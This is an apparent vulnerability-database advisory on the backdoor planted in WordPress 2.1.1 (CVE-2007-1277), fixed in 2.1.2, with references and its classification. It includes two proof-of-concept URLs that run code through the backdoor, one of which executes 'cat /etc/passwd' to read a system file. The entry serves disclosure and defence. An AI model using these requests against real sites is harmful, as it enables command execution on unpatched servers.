WordPress 2.1.1 - Command Execution Backdoor



Proof of Concept
http://www.example.com/wp-includes/feed.php?ix=phpinfo();
http://www.example.com/wp-includes/theme.php?iz=cat /etc/passwd

Affects WordPress

fixed in version 2.1.2

References

CVE 2007-1277
SECUNIA 24374
SECURITYFOCUS 22797
URL https://exchange.xforce.ibmcloud.com/vulnerabilities/32807
URL http://wordpress.org/news/2007/03/upgrade-212/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Views 3934
Verified No
WPVDB ID 6028

Timeline

Publicly Published 2014-08-01 (almost 5 years ago)
Added 2014-08-01 (almost 5 years ago)
Last Updated 2018-08-29 (11 months ago)